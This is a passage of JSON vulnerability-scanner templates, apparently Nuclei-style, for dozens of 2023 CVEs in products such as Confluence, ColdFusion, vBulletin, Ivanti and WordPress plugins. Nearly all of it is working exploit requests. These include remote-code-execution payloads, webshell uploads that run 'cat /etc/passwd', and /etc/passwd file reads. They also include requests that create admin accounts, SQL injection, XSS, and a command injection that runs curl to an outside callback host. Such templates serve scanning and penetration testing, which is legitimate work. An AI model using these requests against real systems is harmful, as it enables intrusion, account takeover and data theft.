class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","part":"body","group":1,"regex":["var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"],"internal":true}]}]},{"id":"CVE-2023-38192","info":{"name":"SuperWebMailer 9.00.0.01710 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /superadmincreate.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPassword=a\"><script>alert(document.doamin);</script>&PasswordAgain=b&Language=de&SubmitBtn=Nutzer+erstellen\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password\" value=\"a\"><script>alert(document.doamin);</script>","SuperWebMailer"],"condition":"and","case-insensitive":true},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6623","info":{"name":"Essential Blocks < 4.4.3 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"}","{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt"],"matchers":[{"type":"dsl","dsl":["status_code == 200","regex('root:.*:0:0:', body_1)","contains(body_2, \"Essential Blocks \u2013 Page\")"],"condition":"and"}]}]},{"id":"CVE-2023-0334","info":{"name":"ShortPixel Adaptive Images < 3.6.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"shortpixel\") && contains(body, \"</script><img src=1 onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-43654","info":{"name":"PyTorch TorchServe SSRF","severity":"critical"},"requests":[{"raw":["POST /models?url=http%3a//{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-4220","info":{"name":"Chamilo LMS <= 1.11.24 - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------SwxF5rRaZb4lETWlpulXn3\n\n--------------------------SwxF5rRaZb4lETWlpulXn3\nContent-Disposition: form-data; name=\"bigUploadFile\"; filename=\"{{filename}}.txt\"\nContent-Type: application/octet-stream\n\n{{md5(num)}}\n\n--------------------------SwxF5rRaZb4lETWlpulXn3--\n","GET /main/inc/lib/javascript/bigupload/files/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,\"{{md5(num)}}\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-0947","info":{"name":"Flatpress < 1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fp-content/","{{BaseURL}}/flatpress/fp-content/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<title>Index of /fp-content</title>\")"],"condition":"and"}]}]},{"id":"CVE-2023-38964","info":{"name":"Academy LMS 6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/courses?query=\"><svg+onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<svg onload=alert(document.domain)>\", \"All courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-6977","info":{"name":"Mlflow <2.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"//proc/self/root\"}\n","GET /model-versions/get-artifact?name={{randstr}}&path=etc%2Fpasswd&version=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"word","part":"header_3","words":["filename=passwd","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35078","info":{"name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/aad/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"critical"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-6329","info":{"name":"Control iD iDSecure - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/login/unlockGetData HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["serial"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"serial","internal":true,"json":[".serial"]}]},{"raw":["POST /api/login/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"passwordCustom\": \"{{javascript_response}}\", \"passwordRandom\": \"{{passwordRandom}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["accessToken"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"access-token","internal":true,"json":[".accessToken"]}]},{"raw":["POST /api/operator/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{access-token}}\nContent-Type: application/json\n\n{\"idType\": \"1\", \"name\": \"{{username}}\", \"user\": \"{{username}}\", \"newPassword\": \"{{password}}\", \"password_confirmation\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/json\")","contains_all(body, \"code\", \"newID\")"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-45542","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/index/?q=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"<script>alert(document.domain)</script>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-36289","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}\"%20onmouseover=alert(document.domain)%20y=&token={{randstr}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain)","hasConfirmation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39108","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_b=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2023-0602","info":{"name":"Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"twittee\")"],"condition":"and"}]}]},{"id":"CVE-2023-4974","info":{"name":"Academy LMS 6.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 500","contains(body, \"Courses</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1719","info":{"name":"Bitrix Component - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=<img%20onerror=alert(document.domain)%20src=1>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'LOG_CNT':","<img onerror=alert(document.domain) src=1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-41599","info":{"name":"JFinalCMS v5.0.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30258","info":{"name":"MagnusBilling - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-4168","info":{"name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"google_map_key\", \"api_key\", \"auth_domain\")"],"condition":"and"}]}]},{"id":"CVE-2023-32563","info":{"name":"Ivanti Avalanche - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /Servlet/Skins HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 333\nContent-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f\nConnection: close\n\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"guid\"\n\n../../../Web/webapps/ROOT\n--------------------------eacf31f23ac1829f\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\n\n<%\nout.println(\"CVE-2023-32563\");\n%>\n--------------------------eacf31f23ac1829f--\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2023-32563"]}]}]},{"id":"CVE-2023-24657","info":{"name":"phpIPAM - 1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /app/login/login_check.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipamusername={{username}}&ipampassword={{password}}\n","GET /app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"Subnet masks\")"],"condition":"and"}]}]},{"id":"CVE-2023-48777","info":{"name":"WordPress Elementor 3.18.1 - File Upload/Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nactions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax\n","GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_4)","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["admin\\\\\\/admin\\-ajax\\.php\",\"nonce\":\"([0-9a-z]+)\""]}]}]},{"id":"CVE-2023-43261","info":{"name":"Milesight Routers - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lang/log/httpd.log"],"max-size":5000,"extractors":[{"type":"regex","regex":["\"username\":\"([^\"]+)\",\"password\":\"(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)\""]}]}]},{"id":"CVE-2023-32235","info":{"name":"Ghost CMS < 5.42.1 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/built%2F..%2F..%2F/package.json","{{BaseURL}}/assets/built%2F..%2F..%2F%E0%A4%A/package.json"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\"","\"version\"","\"ghost\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_5","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-22515","info":{"name":"Atlassian Confluence - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /setup/setupadministrator-start.action HTTP/1.1\nHost: {{Hostname}}\n","@timeout:20s\nPOST /setup/setupadministrator.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nusername={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next\n","POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\nos_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action\n","GET /welcome.action HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, 'Setup is already complete')","contains(body_3, 'Please configure the system administrator account for this Confluence installation')","contains(location_5, '/index.action')","status_code_5 == 302","contains(body_6, 'Administration')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2023-4169","info":{"name":"Ruijie RG-EW1200G Router - Password Reset","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/set_passwd"],"body":"{\n\"username\":\"web\",\n\"admin_new\":\"{{password}}\"\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3847","info":{"name":"MooDating 1.2 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3el43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\",\"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-35844","info":{"name":"Lightdash version <= 0.510.3 Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22432","info":{"name":"Web2py URL - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/default/index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npassword={{password}}&send=%5C%2F%5C%2Foast.pro&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["a href=\"\\/\\/oast.pro\""]},{"type":"word","part":"location","words":["\\/\\/oast.pro"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-2122","info":{"name":"Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type, \"text/html\")","contains(body_2, \"<img src=a onerror=alert(document.domain)>\")","contains(body_2, \"Image optimizer\")"],"condition":"and"}]}]},{"id":"CVE-2023-2813","info":{"name":"Wordpress Multiple Themes - Reflected Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/"],"matchers-condition":"and","matchers":[{"type":"word","words":["<IMG SRC=/ onerror=\"alert(document.domain)\"></img>","wp-content/theme"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-6360","info":{"name":"WordPress My Calendar <3.4.22 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar"]}]},{"raw":["@timeout: 20s\nGET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","contains(body, \"[]\")","duration >= 6"],"condition":"and"}]}]},{"id":"CVE-2023-2178","info":{"name":"Aajoda Testimonials < 2.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, 